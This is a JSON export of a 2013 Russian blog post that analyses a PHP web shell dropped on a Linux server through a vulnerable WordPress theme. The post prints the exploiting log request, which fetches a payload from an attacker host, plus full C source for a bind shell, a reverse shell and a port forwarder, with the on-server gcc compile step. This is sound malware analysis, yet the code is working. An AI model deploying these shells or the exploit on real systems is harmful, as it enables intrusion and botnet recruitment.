{"id":171317,"date":"2013-03-02T00:42:03","date_gmt":"2013-03-01T20:42:03","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=171317"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=171317","title":{"rendered":"\u041f\u0440\u0438\u043c\u0435\u0440 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0441\u0435\u0440\u0432\u0435\u0440 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c *nix \u043c\u043e\u0436\u0435\u0442 \u0441\u0442\u0430\u0442\u044c \u0447\u0430\u0441\u0442\u044c\u044e \u0431\u043e\u0442\u043d\u0435\u0442\u0430<\/span>"},"content":{"rendered":"
\t\u0412 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u043d\u0430 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u0445 \u043f\u043e\u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f <\/a> \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0432\u0441\u0435 \u0447\u0430\u0449\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0434\u043b\u044f \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u0435\u043d\u0438\u044f DDoS-\u0430\u0442\u0430\u043a \u0441\u0435\u0440\u0432\u0435\u0440\u043d\u044b\u0435 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438. \u041e\u0447\u0435\u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u0434\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0442\u0430\u043a\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a \u043d\u0435\u0439 \u0434\u043e\u0441\u0442\u0443\u043f. \u041d\u0435 \u0442\u0430\u043a \u0434\u0430\u0432\u043d\u043e \u044f \u0441\u0442\u043e\u043b\u043a\u043d\u0443\u043b\u0441\u044f \u0441 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u043c, \u043a\u0430\u043a \u043c\u043d\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u043e\u0431\u0440\u0430\u0437\u0446\u043e\u043c PHP Shell’\u0430.
<\/a>
\u0418\u0442\u0430\u043a, \u043a\u0430\u043a \u0436\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u044e\u0442 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0443 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440? \u0422\u0443\u0442 \u0432\u0441\u0435 \u0431\u0430\u043d\u0430\u043b\u044c\u043d\u043e \u2013 \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u043e\u0431\u0440\u0430\u0437\u0435\u0446 \u0431\u044b\u043b \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438<\/a>:<\/p>\n

"GET \/wp-content\/themes\/newsworld\/thumbopen.php?src=http%3A%2F%2Fpicasa.com.orland******.com\/kikok.php HTTP\/1.1" 400 447 "-" "Mozilla\/5.0 (Windows NT 5.1; rv:2.0.1) Gecko\/20100101 Firefox\/4.0.1"<\/code><\/p>\n

\u0412\u043e\u0442 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 kikok.php: paste.ubuntu.com\/5577560\/<\/a>
\u041f\u043e\u0441\u043b\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043d\u0435\u0441\u043b\u043e\u0436\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 \u043f\u043e \u0434\u0435\u043a\u043e\u0434\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044e \u0438\u0437 base64 \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435: paste.ubuntu.com\/5577565\/<\/a>
\u041d\u0430 \u043f\u0435\u0440\u0432\u044b\u0439 \u0432\u0437\u0433\u043b\u044f\u0434, \u0442\u0438\u043f\u0438\u0447\u043d\u044b\u0439 PHP Shell, \u0447\u0442\u043e \u0436\u0435 \u0442\u0443\u0442 \u0442\u0430\u043a\u043e\u0433\u043e \u043d\u0435\u043e\u0431\u044b\u0447\u043d\u043e\u0433\u043e? \u0412 \u0442\u0435\u043b\u0435 PHP-\u0441\u043a\u0440\u0438\u043f\u0442\u0430 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u043a\u043e\u0434 \u043d\u0430 C: <\/p>\n

Sample 1<\/b><\/p>\n
\n
$port_bind_bd_c=" #include <stdio.h> #include <string.h> #include <sys\/types.h> #include <sys\/socket.h> #include <netinet\/in.h> #include <errno.h> int main(argc,argv) int argc; char **argv; {    int sockfd, newfd;  char buf[30];  struct sockaddr_in remote;  if(fork() == 0) {   remote.sin_family = AF_INET;  remote.sin_port = htons(atoi(argv[1]));  remote.sin_addr.s_addr = htonl(INADDR_ANY);   sockfd = socket(AF_INET,SOCK_STREAM,0);  if(!sockfd) perror("socket error");  bind(sockfd, (struct sockaddr *)&remote, 0x10);  listen(sockfd, 5);  while(1)   {    newfd=accept(sockfd,0,0);    dup2(newfd,0);    dup2(newfd,1);    dup2(newfd,2);    write(newfd,"Password:",10);    read(newfd,buf,sizeof(buf));    if (!chpass(argv[2],buf))    system("echo welcome to r57 shell POWERED by d35m0 && \/bin\/bash -i");    else    fprintf(stderr,"Sorry");    close(newfd);   }  } } int chpass(char *base, char *entered) { int i; for(i=0;i<strlen(entered);i++)  { if(entered[i] == '\\n') entered[i] = '\\0';  if(entered[i] == '\\r') entered[i] = '\\0'; } if (!strcmp(base,entered)) return 0; } "; <\/code><\/pre>\n<\/div>\n<\/div>\n
  <\/p>\n
Sample 2<\/b><\/p>\n
\n
$back_connect_c=" #include <stdio.h> #include <sys\/socket.h> #include <netinet\/in.h> int main(int argc, char *argv[]) {  int fd;  struct sockaddr_in sin;  char rms[21]="rm -f ";   daemon(1,0);  sin.sin_family = AF_INET;  sin.sin_port = htons(atoi(argv[2]));  sin.sin_addr.s_addr = inet_addr(argv[1]);   bzero(argv[1],strlen(argv[1])+1+strlen(argv[2]));   fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ;   if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {    perror("[-] connect()");    exit(0);  }  strcat(rms, argv[0]);  system(rms);    dup2(fd, 0);  dup2(fd, 1);  dup2(fd, 2);  execl("\/bin\/sh","sh -i", NULL);  close(fd);  } "; <\/code><\/pre>\n<\/div>\n<\/div>\n
  <\/p>\n
Sample 3<\/b><\/p>\n
\n
$datapipe_c=" #include <sys\/types.h> #include <sys\/socket.h> #include <sys\/wait.h> #include <netinet\/in.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <unistd.h> #include <netdb.h> #include <linux\/time.h> #ifdef STRERROR extern char *sys_errlist[]; extern int sys_nerr; char *undef = "Undefined error"; char *strerror(error)   int error;   {  if (error > sys_nerr) return undef; return sys_errlist[error]; } #endif  main(argc, argv)     int argc;     char **argv;   {    int lsock, csock, osock;   FILE *cfile;   char buf[4096];   struct sockaddr_in laddr, caddr, oaddr;   int caddrlen = sizeof(caddr);   fd_set fdsr, fdse;   struct hostent *h;   struct servent *s;   int nbyt;   unsigned long a;   unsigned short oport;    if (argc != 4) {     fprintf(stderr,"Usage: %s localport remoteport remotehost\\n",argv[0]);     return 30;   }   a = inet_addr(argv[3]);   if (!(h = gethostbyname(argv[3])) &&       !(h = gethostbyaddr(&a, 4, AF_INET))) {     perror(argv[3]);     return 25;   }   oport = atol(argv[2]);   laddr.sin_port = htons((unsigned short)(atol(argv[1])));   if ((lsock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {     perror("socket");     return 20;   }   laddr.sin_family = htons(AF_INET);   laddr.sin_addr.s_addr = htonl(0);   if (bind(lsock, &laddr, sizeof(laddr))) {     perror("bind");     return 20;   }   if (listen(lsock, 1)) {     perror("listen");     return 20;   }   if ((nbyt = fork()) == -1) {     perror("fork");     return 20;   }   if (nbyt > 0)     return 0;   setsid();   while ((csock = accept(lsock, &caddr, &caddrlen)) != -1) {     cfile = fdopen(csock,"r+");     if ((nbyt = fork()) == -1) {       fprintf(cfile, "500 fork: %s\\n", strerror(errno));       shutdown(csock,2);       fclose(cfile);       continue;     }     if (nbyt == 0)       goto gotsock;     fclose(cfile);     while (waitpid(-1, NULL, WNOHANG) > 0);   }   return 20;   gotsock:   if ((osock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {     fprintf(cfile, "500 socket: %s\\n", strerror(errno));     goto quit1;   }   oaddr.sin_family = h->h_addrtype;   oaddr.sin_port = htons(oport);   memcpy(&oaddr.sin_addr, h->h_addr, h->h_length);   if (connect(osock, &oaddr, sizeof(oaddr))) {     fprintf(cfile, "500 connect: %s\\n", strerror(errno));     goto quit1;   }   while (1) {     FD_ZERO(&fdsr);     FD_ZERO(&fdse);     FD_SET(csock,&fdsr);     FD_SET(csock,&fdse);     FD_SET(osock,&fdsr);     FD_SET(osock,&fdse);     if (select(20, &fdsr, NULL, &fdse, NULL) == -1) {       fprintf(cfile, "500 select: %s\\n", strerror(errno));       goto quit2;     }     if (FD_ISSET(csock,&fdsr) || FD_ISSET(csock,&fdse)) {       if ((nbyt = read(csock,buf,4096)) <= 0) \tgoto quit2;       if ((write(osock,buf,nbyt)) <= 0) \tgoto quit2;     } else if (FD_ISSET(osock,&fdsr) || FD_ISSET(osock,&fdse)) {       if ((nbyt = read(osock,buf,4096)) <= 0) \tgoto quit2;       if ((write(csock,buf,nbyt)) <= 0) \tgoto quit2;     }   }   quit2:   shutdown(osock,2);   close(osock);  quit1:   fflush(cfile);   shutdown(csock,2);  quit0:   fclose(cfile);   return 0; } "; <\/code><\/pre>\n<\/div>\n<\/div>\n
  \u041a\u043e\u0434 \u043a\u043e\u043c\u043f\u0438\u043b\u0438\u0440\u0443\u0440\u0435\u0442\u0441\u044f \u043d\u0435\u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435:  <\/p>\n
 cf("\/tmp\/bd.c",$port_bind_bd_c);  $blah = ex("gcc -o \/tmp\/bd \/tmp\/bd.c"); ... <\/code><\/pre>\n
  \u0421\u043e\u0433\u043b\u0430\u0441\u0438\u0442\u0435\u0441\u044c, \u0432\u0435\u0441\u044c\u043c\u0430 \u043d\u0435\u043e\u0431\u044b\u0447\u043d\u0430\u044f \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f.
  \u0410 \u0432\u043e\u0442 \u043a\u0430\u043a \u0440\u0435\u0430\u0433\u0438\u0440\u0443\u0435\u0442 \u043d\u0430 \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0433\u043e \u0440\u043e\u0434\u0430 \u0441\u0435\u043c\u043f\u043b\u044b \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u0430\u044f \u0438\u043d\u0434\u0443\u0441\u0442\u0440\u0438\u044f \u0432 \u0446\u0435\u043b\u043e\u043c: www.virustotal.com\/ru\/file\/4d0d5be4e24ba5b4f0c2cca2398e2ac123bd5c13e8eeadd07fc0c1a1fb61bb1f\/analysis\/1362169702\/<\/a>    \t \t\t   \t<\/p>\n
<\/div>\n<\/p><\/div>\n
 \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438  http:\/\/habrahabr.ru\/post\/171317\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
   \t\u0412 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u043d\u0430 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u0445 \u043f\u043e\u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f  \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f <\/a> \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0432\u0441\u0435 \u0447\u0430\u0449\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0434\u043b\u044f \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u0435\u043d\u0438\u044f DDoS-\u0430\u0442\u0430\u043a \u0441\u0435\u0440\u0432\u0435\u0440\u043d\u044b\u0435 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438. \u041e\u0447\u0435\u0432\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u0434\u043b\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0442\u0430\u043a\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0441\u043d\u0430\u0447\u0430\u043b\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a \u043d\u0435\u0439 \u0434\u043e\u0441\u0442\u0443\u043f. \u041d\u0435 \u0442\u0430\u043a \u0434\u0430\u0432\u043d\u043e \u044f \u0441\u0442\u043e\u043b\u043a\u043d\u0443\u043b\u0441\u044f \u0441 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u043c, \u043a\u0430\u043a \u043c\u043d\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u043e\u0431\u0440\u0430\u0437\u0446\u043e\u043c PHP Shell’\u0430.  <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-171317","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/171317","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=171317"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/171317\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=171317"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=171317"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=171317"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}